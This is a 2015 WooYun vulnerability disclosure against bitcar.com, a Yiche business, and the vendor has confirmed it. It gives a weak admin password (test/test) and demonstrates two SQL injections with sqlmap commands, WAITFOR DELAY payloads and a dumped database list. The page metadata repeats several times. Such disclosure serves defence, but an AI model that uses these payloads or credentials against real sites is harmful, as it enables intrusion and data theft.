易车网某业务多处漏洞(后台弱口令、SQL注入等)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-091338

漏洞标题：易车网某业务多处漏洞(后台弱口令、SQL注入等)

漏洞作者：玉林嘎

提交时间：2015-01-12 12:28

修复时间：2015-02-26 12:30

公开时间：2015-02-26 12:30

漏洞类型：应用配置错误

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 help@wooyun.org

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-01-12：细节已通知厂商并且等待厂商处理中
2015-01-12：厂商已经确认，细节仅向厂商公开
2015-01-22：细节向核心白帽子及相关领域专家公开
2015-02-01：细节向普通白帽子公开
2015-02-11：细节向实习白帽子公开
2015-02-26：细节向公众公开

简要描述：

求高rank

详细说明：

http://www.bitcar.com/ 易卡互动为易车网旗下业务
第一处:
http://www.bitcar.com/admin/Manage.aspx
弱口令 test test

第二处：
2个sql注入
http://dsa.bitcar.com 该站前台及后台登陆均存在post注入
1、
sqlmap -u "http://dsa.bitcar.com/Login.aspx?methed=checkLogin" --data "format=html&username=admin&password=123456&isAutoLogin=0" -p "username"

Place: POST
Parameter: username
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: format=html&username=admin'; WAITFOR DELAY '0:0:5'--&password=123456&isAutoLogin=0
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: format=html&username=admin' WAITFOR DELAY '0:0:5'--&password=123456&isAutoLogin=0
---
[12:16:23] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008

sqlmap -u "http://dsa.bitcar.com/Login.aspx?methed=checkLogin" --data "format=html&username=admin&password=123456&isAutoLogin=0" -p "username" --dbs

available databases [17]:
[*] [TfsTaskManagement	]
[*] AppfabricServiceRepository
[*] bc
[*] BitCar
[*] Devbbs
[*] dzbbs
[*] EquipmentsManagement
[*] ipad
[*] ITOMS
[*] ITSupportLibrary
[*] master
[*] model
[*] msdb
[*] ResourceMonitoring
[*] tempdb
[*] TfsManager
[*] WorkFlowStore

2、
sqlmap -u "http://dsa.bitcar.com/Page/Manage/Login.aspx" --data "__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTQ2MTcxMjc1MQ9kFgICAQ9kFgICBw8PFgIeBFRleHQFGOeUqOaIt%2BWQjeaIluWvhueggemUmeivr2RkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQxsb2dpbl9zdWJtaXS%2FxNgHjvhP9i5tBk%2FVAcH8hvDkVw%3D%3D&__EVENTVALIDATION=%2FwEWBALAkP%2FHDAKl1bKzCQK1qbSWCwKFlvTPA2xB19JRskeB1JdC4eNSwq6Ciu9L&txtUserName=123123&txtPassWord=123123&login_submit.x=52&login_submit.y=18"

Place: POST
Parameter: txtUserName
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTQ2MTcxMjc1MQ9kFgICAQ9kFgICBw8PFgIeBFRleHQFGOeUqOaIt+WQjeaIluWvhueggemUmeivr2RkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQxsb2dpbl9zdWJtaXS/xNgHjvhP9i5tBk/VAcH8hvDkVw==&__EVENTVALIDATION=/wEWBALAkP/HDAKl1bKzCQK1qbSWCwKFlvTPA2xB19JRskeB1JdC4eNSwq6Ciu9L&txtUserName=123123'; WAITFOR DELAY '0:0:5'--&txtPassWord=123123&login_submit.x=52&login_submit.y=18
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTQ2MTcxMjc1MQ9kFgICAQ9kFgICBw8PFgIeBFRleHQFGOeUqOaIt+WQjeaIluWvhueggemUmeivr2RkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQxsb2dpbl9zdWJtaXS/xNgHjvhP9i5tBk/VAcH8hvDkVw==&__EVENTVALIDATION=/wEWBALAkP/HDAKl1bKzCQK1qbSWCwKFlvTPA2xB19JRskeB1JdC4eNSwq6Ciu9L&txtUserName=123123' WAITFOR DELAY '0:0:5'--&txtPassWord=123123&login_submit.x=52&login_submit.y=18
---
[12:18:10] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008

第三处：
http://www.bitcar.com 被挂博彩

漏洞证明：

http://www.bitcar.com/ 易卡互动为易车网旗下业务
第一处:
http://www.bitcar.com/admin/Manage.aspx
弱口令 test test

Place: POST
Parameter: username
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: format=html&username=admin'; WAITFOR DELAY '0:0:5'--&password=123456&isAutoLogin=0
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: format=html&username=admin' WAITFOR DELAY '0:0:5'--&password=123456&isAutoLogin=0
---
[12:16:23] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008

sqlmap -u "http://dsa.bitcar.com/Login.aspx?methed=checkLogin" --data "format=html&username=admin&password=123456&isAutoLogin=0" -p "username" --dbs

available databases [17]:
[*] [TfsTaskManagement	]
[*] AppfabricServiceRepository
[*] bc
[*] BitCar
[*] Devbbs
[*] dzbbs
[*] EquipmentsManagement
[*] ipad
[*] ITOMS
[*] ITSupportLibrary
[*] master
[*] model
[*] msdb
[*] ResourceMonitoring
[*] tempdb
[*] TfsManager
[*] WorkFlowStore

Place: POST
Parameter: txtUserName
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTQ2MTcxMjc1MQ9kFgICAQ9kFgICBw8PFgIeBFRleHQFGOeUqOaIt+WQjeaIluWvhueggemUmeivr2RkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQxsb2dpbl9zdWJtaXS/xNgHjvhP9i5tBk/VAcH8hvDkVw==&__EVENTVALIDATION=/wEWBALAkP/HDAKl1bKzCQK1qbSWCwKFlvTPA2xB19JRskeB1JdC4eNSwq6Ciu9L&txtUserName=123123'; WAITFOR DELAY '0:0:5'--&txtPassWord=123123&login_submit.x=52&login_submit.y=18
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTQ2MTcxMjc1MQ9kFgICAQ9kFgICBw8PFgIeBFRleHQFGOeUqOaIt+WQjeaIluWvhueggemUmeivr2RkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQxsb2dpbl9zdWJtaXS/xNgHjvhP9i5tBk/VAcH8hvDkVw==&__EVENTVALIDATION=/wEWBALAkP/HDAKl1bKzCQK1qbSWCwKFlvTPA2xB19JRskeB1JdC4eNSwq6Ciu9L&txtUserName=123123' WAITFOR DELAY '0:0:5'--&txtPassWord=123123&login_submit.x=52&login_submit.y=18
---
[12:18:10] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008

第三处：
http://www.bitcar.com 被挂博彩

修复方案：

好好修复下

版权声明：转载请注明来源玉林嘎@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2015-01-12 12:30

厂商回复：

非常感谢对易车的帮助，我们会尽快处理

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-091338

漏洞标题：易车网某业务多处漏洞(后台弱口令、SQL注入等)

相关厂商：易车

漏洞作者：玉林嘎

提交时间：2015-01-12 12:28

修复时间：2015-02-26 12:30

公开时间：2015-02-26 12:30

漏洞类型：应用配置错误

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 help@wooyun.org

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源玉林嘎@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-091338

漏洞标题：易车网某业务多处漏洞(后台弱口令、SQL注入等)

相关厂商：易车

漏洞作者： 玉林嘎

提交时间：2015-01-12 12:28

修复时间：2015-02-26 12:30

公开时间：2015-02-26 12:30

漏洞类型：应用配置错误

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 help@wooyun.org

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-091338"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 玉林嘎@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：玉林嘎

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源玉林嘎@乌云